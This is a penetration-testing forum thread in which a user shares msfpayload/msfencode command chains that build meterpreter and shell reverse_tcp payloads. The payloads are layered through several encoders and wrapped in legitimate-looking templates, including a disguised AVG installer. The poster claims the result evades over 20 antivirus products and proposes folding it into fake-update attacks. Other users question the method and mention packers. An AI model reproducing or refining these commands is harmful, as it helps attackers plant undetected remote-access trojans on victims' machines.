metasploit pause the pipe

[pentest09]

Hi all is there a way to pause the encoding of a payload to leave enough time for a previous payload to be created and then encode again with the previous instead of starting it again, ie use different methods but pipe them with a pause so as to re encode the previous payload? maybe script it?

Regards Dee

[lupin]

.....huh?

Maybe explain that with some more details. What do you hope to achieve by doing this? Are you talking about encoding with msfencode or is this encoding you refer to being done as part of an exploit? What do you mean by previous payload - are you talking about some sort of staged exploit?

[espreto]

Again...

Be even more detailed, did not quite understand what you want. Give an example, even if it is wrong.

Metasploit Unleashed - Mastering the Framework

Sign up on this list.

framework Info Page

Regards,

Edit:
lupin was faster on the trigger.

[pentest09]

ok here goes, without posting the scheme heres the idea,
************************************************** *********************
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.8 LPORT=5632 R | msfencode -e ENCODER -c ... -t raw | msfencode -e ENCODER -c ... -t raw | msfencode -e ENCODER -c ... -t raw | msfencode -x avg_free_stb_all_9_114_cnet.exe -t exe -e ENCODER -c ... -o /root/1.exe
************************************************** *********************
Now this scheme gets picked up by AV I have tried random encoding -c etc so as to reduce the chance of someone else using the same scheme and letting out the signature.
So I go even further and then complete again using same commands but now use the previous 1.exe again with randomised -c times and output to > 2.exe .....then i finally repeat again same process but using the 2.exe as template and finally output to final.exe and it evades over 20 AVs I have checked , the exe is executable even with all the encoding and gives my shell.

Now here's where i want to go with it. Can I complete this 3 step process or more maybe if needed into one command using the output as a template for the next encoding like pipe | ? I did try but the command completes before the output creates the .exe therefore its not yet created to be used in the next step (ie) 1.exe template for -2.exe template for -final.exe so i need it to pause the command long enough for the exe to be created then use it as the template for step 2 then step 3 etc.

I have spent a lot of time previously as espreto will know with my AV tests video and the encoding is now rendered useless as the copying of it has been used i guess and submitted to virus total, as of 8 months undetection before the video was posted 2 weeks after its detected, so I tried so many different ways and found this to be :

1: undetectable 100% (without this it would get picked up RozenaAH generic)
2: a way of randomizing the encode so that the chance of it being duplicated would be very rare.

this could be then automated into the likes of g0tmilks FakeAP and Fakeupdate etc. as it now gets detected.....

well thats enough from me hope u guys have all the info. thanks for ur time btw.

Kind Regards Dee

[espreto]

What are you trying to do is nearly so.

Antivirus Bypass

The fact that encode several times, does not mean that you can evade the detection of AVs by doing this you run the danger of leaving it more detectable.
You can study on code obfuscation, which is the process of changing the look of the source code. There are several tools that aid, for example:

UPX: the Ultimate Packer for eXecutables - Homepage

There are several other...
See also this video for you to have a notion.

http://www.backtrack-linux.org/forum...-iexpress.html

Msfencode is not the only feature to circumvent AVs.

Regards,

[lupin]

So you're using each of those output executables as a template for the next run?

Does that actually make any difference in terms of AV detection, because from what I understood (and keep in mind that I havent checked this in detail) the template executable that you specify with -X is only used as a framework into which your encoded shellcode is placed. I would have thought that using an output executable as a template would only result in the same template information being copied across - basically netting you no benefit from doing this three times.

Has your testing confirmed otherwise?

[pentest09]

Yep the process does work if i only encode once with the 1.exe output it gets detected as rozenaAH generic example:


#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168..0.8 LPORT=4444 R | msfencode -x Setup.exe -t exe -k -e x86/shikata_ga_nai -c 10 -o /root/Payloads/encode30.exe (used to evade all) now detected.

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.105 LPORT=5632 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 5 -o payload.exe (used to pass all) get detected also. and exe is not able to run

mixing this up a little now goes undetected and does not mess up the exe, binders get detected iexpress is useless with eset, and also AVG picks up the exe signatures as being interfered with, this multi method also rectifies this.

Eset and bitdefender pick up all of the SET no problem even with backdoor encoded 16 and shikata_ga_nai didnt use to as of last week .

Regards Dee

edit please note: im no expert as the experts will know, so all feedback welcome.
Also its not good if you try to explain to a user that security awareness is the key and give them an example and your payload gets picked up by their AV, they have no interest from then on, ("see told you im safe")so having a payload undetectable makes them wake up and notice the issue. client side especially.

[TAPE]

AV by-pass is always interesting, I used to check mine with the meager options available to me which were ;
>AVG
>Avira
>Clam

After checking with aVast, a couple which were previously undetected, were no longer

Mind you a couple are still ok.

Will be doing a bit more testing.

The only problem with posting what works is that after it gets posted.. it gets FUBARed..

[pentest09]

Yes i know thats why i have tried to randomize the encoding options to alleviate the chances of it being used by someone and virus totaling it.

Eset is on all my machines and that proved problematic for me in learning to exploit as it picks everything up and has anti arp,dns and other methods in the firewall ettercap and such wont work so in a way it has helped along in terms of evasion other AVs just dont cut it.

Have been on various other BAD forums checking wot the bad guys are up to and well its not good, no mention of BT and so many drive by methods for the scripties to mess up things, once again tried and tested and my AV defeats all but a lot of pc and laptops i get come to me are full of these bad progs and all have the same software installed and false sense of security.

Working on a couple now same problem. home users need educating in this area big time, The Corps have protections in place for this.

Anyway Thanks for reply Tape and others keep em coming as I do learn a bit you know.

Regards Dee

[lupin]

Yep the process does work if i only encode once with the 1.exe output it gets detected as rozenaAH

You mentioned that you used random values for -c for each encoding run - Im assuming that you designed a test to confirm that different values for -c on your last run is not the reason for no virus detection, rather than the 3 run template copying process? What are the differences in the output files from creating an exe using this three step process as opposed to creating one with a single step using the same base template as the first run and the exact same encoding settings as the last run? Have you done a binary analysis? If my assertion from earlier is correct only the .text section of the executable should be different (other than different offset and size values elsewhere).

Since the shikata_ga_nai encoder can produce different output on subsequent runs using the exact same input data and settings, I imagine it would be very difficult to test this sort of stuff reliably...

home users need educating in this area big time, The Corps have protections in place for this.

Depends on the Corporation you are talking about. I think you'd be surprised how many Corporations trust their AV solutions unreservedly.

As for the Home users -I actually don't think that they have much of a chance to protect themselves appropriately against this stuff. If you actually can "educate" them that their AV solution cannot be trusted, what are they meant to do then? How can they protect themselves without learning a bunch of complicated stuff they may not have the interest or capacity to learn? I know supposed IT professionals who don't understand this stuff, so what hope does a home user have?